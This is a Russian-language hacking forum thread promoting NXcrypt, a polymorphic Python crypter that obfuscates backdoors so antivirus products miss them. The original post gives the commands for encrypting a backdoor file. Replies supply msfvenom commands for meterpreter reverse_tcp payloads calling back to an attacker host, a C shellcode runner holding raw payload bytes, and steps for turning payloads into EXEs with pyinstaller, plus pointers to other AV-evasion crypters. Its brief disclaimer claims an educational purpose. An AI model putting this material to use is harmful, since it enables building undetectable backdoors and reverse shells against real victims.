![]() |
Информация,которая представлена в обзоре ,предназначена исключительно для ознакомления и изучения информационной безопасности. Администрация ресурса и автор обзора не призывают к её использованию в незаконных целях. Приветсвую всех Форумчан,Дорогих постоянных гостей нашего ресурса и тех,кого интересует ИБ. Буквально,несколько дней назад,Hadi опубликовал великолепную ,на мой взгляд работу. Это полиморфный Криптор,обладающий своими модулями шифрования и инжекта. Он использует внутренний модуль python py_compile , компилирует код в байт-код файла .pyc file И затем конвертирует этот файл в обычный .py,обфусцируя код таким образом,что меняется md5sum на выходе. Модуль инжекта предназначен для ввода вредоносного файла python в обычный файл с многопотоковой системой. Вот такой инструмент,обработанные файлы которым ,по состоянию на текущий момент,не детектятся AV. Удобен он конечно в совместной работе с Metasploit. Никаких особенных зависимостей и предпочтений Linux-дистрибутивов не имеет. Ну чтож,приступим: Код: Код:
git clone https://github.com/Hadi999/NXcrypt.githttps://forum.antichat.xyz/attachmen...933b9d16b6.png Применение и алгоритмы команд: Код: Код:
sudo ./NXcrypt.py --file=backdoor.py --output=output_backdoor.py # encrypt backdoor.py and output file is output_backdoor.pyНу ,а я на этом желаю вам отличного настроения и до новых встреч. |
Молодца!) хачу ищо!))
|
Цитата:
|
Цитата:
удалась урожайной по отменному материалу,хотя ещё не закончилась. Коллег всегда приятно читать,узнавать новое,а это отдых и чувство комфорта. За ссылку спасибо на py2exe-отличное дополнение темы. |
Люди добрый, нужен совет!
1)Из metasploit получаю shellcode: msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.123 lport=12345 -b \0x0a\0x0b\0xff -f c > /home/iam/shellcode.c 2) Затем пытаюсь запустить. #include #include unsigned char code[] = "\x48\x31\xc9\x48\x81\xe9\xf7\xff\xff\xff\x48\x8d\ x05\xef\xff" "\xff\xff\x48\xbb\x83\xa9\xe9\x96\xd1\x41\xaa\xc9\ x48\x31\x58" "\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xcb\x98\x16\ xfc\xd8\x19" "\x33\x7f\x93\xe1\x60\x40\x9c\x70\x63\xa3\xa1\xe8\ xb3\x24\xd6" "\x4e\xaf\x9f\xd3\xc3\xc0\xce\x48\x2b\xa8\x96\xe9\ xa8\xb7\x99" "\xd4\x09\x3d\x81\x3a\xab\xe9\xa6\xe8\x81\x02\xdb\ x32\xf8\xa1" "\x1f\x37\x2b\xba\x93\xe9\x83\xb1\x99\xd4\x18\xf4\ x93\x8c\xac" "\x16\x70\xd1\x41\xaa\xc9"; int main(void) { printf("Shellcode length: %dn", (int)sizeof(code)-1); int (*ret)() = (int(*)())code; ret(); return 0; } НО ОН ВОЗВРАЩАЕТ SEGMENTATION FAULT В чем может быть дело? |
Цитата:
С портом понятно,что для примера. Попробуйте вначале так: # msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=12345 -a x86 --platform Linux -f c #include #include Т.е. ,без отсечения -b (вредных символов) |
Спасибо, очень познавательно! Попробовал конвертировать при помощи утилы py2exe - вываливает ошибку такого плана
c:\Python27>python setup.py py2exe running py2exe creating c:\Python27\build creating c:\Python27\build\bdist.win-amd64 creating c:\Python27\build\bdist.win-amd64\winexe creating c:\Python27\build\bdist.win-amd64\winexe\collect-2.7 creating c:\Python27\build\bdist.win-amd64\winexe\bundle-2.7 creating c:\Python27\build\bdist.win-amd64\winexe\temp creating c:\Python27\dist *** searching for required modules *** error: compiling 'meterpreter2.py' failed TypeError: compile() expected string without null bytes Может кто из форумчан сталкивался? Гуглить пробовал, но решения так и не нашел. |
Цитата:
|
Цитата:
|
Хочу узнать получилось ли кому то конвертировать в EXE так как у меня такая же ошибка как у форумчан выше: "TypeError: compile() expected string without null bytes"
|
Цитата:
Расскажу,как иногда это делаю. Сразу оговорюсь,что py2exe не пользовался. Если кто желает переквалифицировать py в exe после полиморфного чудовища из темы, то это плохая идея. Использую для таких целей pyinstaller. 1.Готовлю файл py c помощью msfvenom Например,даже без указания цели: msfvenom --payload=python/meterpreter/reverse_tcp --out=solomon.py Готово,этот файл можно будет найти по пути cd-ls-solomon.py 2.Для удобства можно скопировать в директорию test (к примеру) на рабочем столе. #cd, #ls, #cp solomon.py /root/Рабочий\ стол/test 3.# rm -rf solomon.py (нечего мусорить лишний раз) 4.Захожу в директорию test и работаю с pyinstaller cd /root/Рабочий\ стол/test/ ls - видим наш solomon.py Теперь pyinstaller solomon.py 5.Всё,он сам сделает требуемое.И это без дополнительных опций (сжатие и т.д) В директории test создадутся ещё 2 директории build и dist В них можно найти файлы без расширения solomon Это и есть экзешники. Иногда использую вот такую красоту.На Kali Работает,тоже предлагает форматы. https://github.com/r00t-3xp10it/venom.git Вопрос следующий в том,как ещё и закриптовать в exe-формате. Avoidz из таких инструментов,можно ещё много нарыть на форуме по бай-пасам. |
Уважаемый Vertigo прав - обфусцированный и закодированный py-файл не конвертится. Я сделал полезную нагрузку msfvenom-om и использовав библиотеку ctypes вставил ее в py-файл, а потом pyinstaller - все прошло. Ради интереса заюзал NXcrypt и попробовал собрать - та же ошибка. Единственный момент, который не учел - разрядность ОС. Ехе при запуске ругнулся на несовместимость.
|
Цитата:
Из примера ,файл solomon - это импровизированное произвольное название выходного файла.У Вас он может быть иным. |
Цитата:
Вот скрины как и что должно получиться. |
Цитата:
За других я не могу сказать,и это будет правильными словами,поскольку нужны очень глубокие знания и опыт . К тому же,например ,не понимаю,чем не устраивают другие решения с файлами-экзешниками,коими богата наша база форума. Инструмент задуман для совместной работы с Метасплойт,позволяет быть необнаруженными файлам,при атаке на современные системы.Разрабатывать конкретно под него что-то другое для работы с ним ? Это не актуально.Время идёт,лаборатории работают над своими продуктами(и правильно делают).Когда-нибудь,его использование тоже станет неприменимым,а появятся другие решения. |
Цитата:
FatRat - в умелых руках ,то что нужно. На Зед Хакере можете поискать крипторы по своему запросу,для кометы там тоже что-то недавно было. Skull Cryptor можно поискать в инете. На джитхабе много ,ссылки давать не буду -меня поймут неправильно и к посту это не относится. |
| Время: 04:57 |